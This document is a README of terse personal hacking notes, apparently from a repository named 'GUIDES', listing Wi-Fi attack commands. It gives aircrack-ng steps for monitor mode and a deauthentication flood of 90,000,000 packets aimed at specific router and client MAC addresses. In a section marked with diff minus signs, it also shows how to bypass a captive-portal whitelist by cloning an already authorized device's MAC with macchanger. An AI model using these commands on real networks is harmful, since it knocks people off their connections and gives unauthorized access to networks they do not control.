elithaxxor/GUIDES/README.md

 airemon-ng start external_radio 6 # the number is the channel  (TO START MONITOR MODE) kismet -c radio_name  ## GETS THE MAC ADDRESS

 ## send deauth
 #1 find mac for router (-a) and client (-c)
 netdiscover -r 192.168.50.1/24
 aireplay-ng --deauth 90000000 -a F0:2F:74:2C:7E:88 -c 9a:26:55:ed:ef:84 wlo1

-### MAC ADDRESS RANDOMIZATION ( CELL PHONES )
-## conecting to portals --> swap mac address on whitelist with an already authorized Mac address
-# 1. put card into wiresless monitor mode
-# 2. find exisitng users on the whitelist. find the channel of ESSID
-# 3. copy the mac connected to router.
-sudo apt-get install macchanger aircrack-ng sudo iwconfig wirelessInterface down sudo macchanger -r wirelessInterface ip a # to find current NICs in use sudo airmon-ng start wirelessInterface # to put in into monitor mode sudo airodump-ng wirelessInterface -c 11 --encrypt OPN # to see only open networks --> displays list of connected devices on network sudo ifconfig nicNonMonitorMode down sudo macchanger -m newMacfromabove nicNonMonitormode sudo ifconfig nicNonMonitorMode up

-################################

 ###########################